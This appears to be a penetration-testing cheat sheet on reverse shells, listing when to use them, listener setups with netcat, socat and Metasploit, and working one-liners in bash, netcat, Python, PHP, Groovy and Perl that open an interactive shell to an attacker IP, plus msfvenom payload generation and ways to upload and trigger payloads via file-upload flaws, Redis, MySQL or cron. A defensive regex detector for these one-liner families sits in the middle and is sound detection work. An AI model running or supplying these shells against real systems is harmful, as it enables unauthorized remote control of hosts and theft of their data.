Situations where a reverse connection is used
- No HTTP server is installed, or the web root cannot be located
- The target is on an internal network with a private IP
- The target IP changes dynamically
- Port 6379 does not allow inbound connections
- The one-line webshell has been deleted
Common ways to listen on a port
- netcat: nc -lvp 7777
- msf:
  msfconsole
  use exploit/multi/handler
  set payload php/meterpreter/reverse_tcp
  set lhost 192.168.37.130
  set lport 7777
  run
- socat: socat TCP-LISTEN:7777 - (on Kali)
Ways to establish the reverse connection
- Linux bash:
  bash -i >& /dev/tcp/192.168.37.129/7777 0>&1
- netcat:
  nc -e /bin/bash 192.168.37.129 7777
- Python:
  python -c "import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('192.168.37.129',7777));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);"
- PHP:
  1) php -r 'exec("/bin/bash -i >& /dev/tcp/192.168.37.129/7777");'
  2) php -r '$sock=fsockopen("192.168.37.129",7777);exec("/bin/bash -i <&3 >&3 2>&3");'
- Java (Groovy syntax, e.g. a script console):
  r = Runtime.getRuntime();
  p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/192.168.37.129/7777;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[]);
  p.waitFor();
- perl:
  perl -e 'use Socket;$i="192.168.37.129";$p=7777;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
- msf-PHP:
  msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.37.130 lport=7777 -o shell.php
- msf-Java:
  1) msfvenom -p java/meterpreter/reverse_tcp lhost=192.168.37.130 lport=7777 -f war -o shell.war
  2) msfvenom -p java/meterpreter/reverse_tcp lhost=192.168.37.130 lport=7777 -f jar -o shell.jar
- msf-exe:
  msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.37.130 lport=7777 -i 5 -f exe -o test.exe
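From the defender's side, every one-liner listed above leaves the same footprint: a web-server or service account spawning an interpreter whose command line combines a network endpoint with an interactive shell. The following detector is an added example, not code from the original notes. It parses constructed process-execution records (loosely modelled on auditd execve logging) and applies one rule per one-liner family: the shell redirect to /dev/tcp, netcat with -e, Python socket + dup2, PHP fsockopen + exec, and Perl Socket + exec. The record format, the IP 203.0.113.10, and the assumption that uid 33 is the web-server account (www-data on Debian-based systems) are all constructed for this example.

```python
import re

# Constructed sample process-execution records (not from the original page), loosely modelled
# on auditd execve logging. Assumptions: uid 33 is the web-server service account (www-data on
# Debian-based systems) and ppid 1204 is a web-server worker; 203.0.113.10 is a documentation IP.
SAMPLE_RECORDS = [
    'uid=33 comm="apache2" ppid=1 cmdline="/usr/sbin/apache2 -k start"',
    'uid=33 comm="bash" ppid=1204 cmdline="bash -i >& /dev/tcp/203.0.113.10/7777 0>&1"',
    'uid=33 comm="nc" ppid=1204 cmdline="nc -e /bin/bash 203.0.113.10 7777"',
    'uid=33 comm="python" ppid=1204 cmdline="python -c import socket,subprocess,os;'
    's=socket.socket();s.connect((\'203.0.113.10\',7777));os.dup2(s.fileno(),0);'
    'subprocess.call([\'/bin/bash\',\'-i\'])"',
    'uid=33 comm="php" ppid=1204 cmdline="php -r $sock=fsockopen(\'203.0.113.10\',7777);'
    'exec(\'/bin/bash -i <&3 >&3 2>&3\');"',
    'uid=33 comm="perl" ppid=1204 cmdline="perl -e use Socket;socket(S,PF_INET,SOCK_STREAM,'
    'getprotobyname(\'tcp\'));connect(S,sockaddr_in(7777,inet_aton(\'203.0.113.10\')));'
    'exec(\'/bin/sh -i\')"',
    'uid=1000 comm="python" ppid=2201 cmdline="python -c import socket;print(socket.gethostname())"',
    'uid=1000 comm="bash" ppid=2201 cmdline="bash -c exec 3<>/dev/tcp/203.0.113.10/80"',
    'uid=0 comm="cron" ppid=1 cmdline="/usr/sbin/cron -f"',
]

# Service accounts that should never spawn a shell bound to a network endpoint
# (constructed assumption for this example).
SERVICE_UIDS = {33}

# One rule per one-liner family: shell redirect to /dev/tcp, netcat with -e,
# Python socket + dup2, PHP fsockopen + exec, Perl Socket + exec.
RULES = [
    ("bash_dev_tcp", re.compile(r"/dev/tcp/\S+/\d+")),
    ("netcat_exec", re.compile(r"\b(?:nc|ncat|netcat)\b.*\s-e\s+\S*sh\b")),
    ("python_socket_dup2", re.compile(r"\bsocket\b.*\.connect\(.*\bdup2\(")),
    ("php_fsockopen_exec", re.compile(r"\bfsockopen\(.*\bexec\(")),
    ("perl_socket_exec", re.compile(r"\buse Socket\b.*\bexec\(")),
]

# key=value pairs; a double-quoted value may contain spaces and punctuation.
FIELD_RE = re.compile(r'(\w+)=("([^"]*)"|(\S+))')


def parse_record(line):
    """Split one key=value record into a dict of string fields."""
    fields = {}
    for m in FIELD_RE.finditer(line):
        fields[m.group(1)] = m.group(3) if m.group(3) is not None else m.group(4)
    return fields


def match_rules(cmdline):
    """Return the names of every reverse-shell rule that matches a command line."""
    return [name for name, rx in RULES if rx.search(cmdline)]


def scan(records):
    """Produce one finding per (record, rule) hit, rated by which account ran the command."""
    findings = []
    for line in records:
        rec = parse_record(line)
        cmdline = rec.get("cmdline", "")
        for rule in match_rules(cmdline):
            uid = int(rec.get("uid", -1))
            findings.append({
                "rule": rule,
                "uid": uid,
                "comm": rec.get("comm"),
                "ppid": rec.get("ppid"),
                # A service account opening an outbound shell is far more suspicious than a
                # logged-in user probing a port through /dev/tcp, so only the former is "high".
                "severity": "high" if uid in SERVICE_UIDS else "medium",
                "cmdline": cmdline,
            })
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_RECORDS):
        print(f"[{f['severity']}] {f['rule']}: uid={f['uid']} comm={f['comm']} :: {f['cmdline']}")
```

Run against the constructed records, the five web-server-account one-liners are rated high, the developer's connectivity check through /dev/tcp is rated medium, and the benign `socket.gethostname()` call is not flagged because the Python rule requires both `.connect(` and `dup2(`. In production the same rules would be fed from the execve records of the audit daemon or an EDR agent, with the service-account set taken from the host's actual web-server user.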
The msf payloads are used together with the msf listener module (exploit/multi/handler).
Reverse connection workflow
Listen on a port -> execute the command, or upload the payload and access it -> the connection is established
How to upload the file:
- File upload vulnerability
- Write the file via MySQL, Redis, or the CMS
- File-writing commands: tee, or a .py script
How to trigger it: access the file, or let a scheduled task run it automatically